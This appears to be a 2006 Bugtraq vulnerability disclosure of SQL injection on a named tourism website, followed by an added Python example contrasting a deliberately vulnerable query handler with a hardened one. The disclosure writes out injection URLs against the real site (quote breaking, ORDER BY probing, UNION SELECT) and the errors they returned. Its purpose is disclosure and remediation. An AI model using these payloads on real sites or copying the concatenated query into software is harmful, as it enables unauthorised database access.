
Bugtraq: SQL Injection in incredibleindia.org

From: <susam_pal_at_yahoo.co.in>
Date: 16 Apr 2006 09:53:43 -0000

Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to admin_at_incredibleindia.org

Description:

www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP ODBC error messages can be displayed by passing bad values for the parameters in the URL.

Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'

Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'.

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column called 'mnccategoryid'.

Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3--

Error Found: None

Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4--

Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them is an integer.

Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.

Conclusion: The 1st column in the select query is an integer.

Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.
Received on Apr 19 2006
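
The root cause the post describes (a numeric URL parameter concatenated into the query, with driver errors echoed to the client) shown beside a hardened handler. This is an added example, not code from the original post or from the site. Python's sqlite3 stands in for the ASP/ODBC stack; only the table names `mncpage`, `mnccategory` and the column `mnccategoryid` come from the post, and the other columns, the rows and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in schema: only the table names and mnccategoryid come from
# the post; the other columns and the rows are assumptions for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE mnccategory (mnccategoryid INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE mncpage (pageid INTEGER PRIMARY KEY, title TEXT,
                              body TEXT, mnccategoryid INTEGER);
        INSERT INTO mnccategory VALUES (1, 'Destinations');
        INSERT INTO mncpage VALUES (828, 'Sample page', 'Sample body', 1);
    """)
    return db

GENERIC_ERROR = (500, "An error occurred.")  # no driver text reaches the client

def page_vulnerable(db, page_id):
    """Pattern implied by the post: value concatenated, driver error echoed."""
    sql = ("SELECT mncpage.pageid, mncpage.title, mncpage.body "
           "FROM mncpage, mnccategory WHERE mncpage.pageid = " + page_id +
           " AND mncpage.mnccategoryid = mnccategory.mnccategoryid")
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)  # leaks query structure, as the ODBC errors did

def page_hardened(db, page_id):
    """Strict integer check, bound parameter, generic error message."""
    if not (page_id.isascii() and page_id.isdigit() and len(page_id) <= 9):
        return 400, "Invalid page id."
    sql = ("SELECT mncpage.pageid, mncpage.title, mncpage.body "
           "FROM mncpage JOIN mnccategory "
           "ON mncpage.mnccategoryid = mnccategory.mnccategoryid "
           "WHERE mncpage.pageid = ?")
    try:
        return 200, db.execute(sql, (int(page_id),)).fetchall()
    except sqlite3.Error:
        return GENERIC_ERROR
```

Either control alone closes the issue reported here; the generic error response additionally removes the schema disclosure channel if some other query is later found to be injectable.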
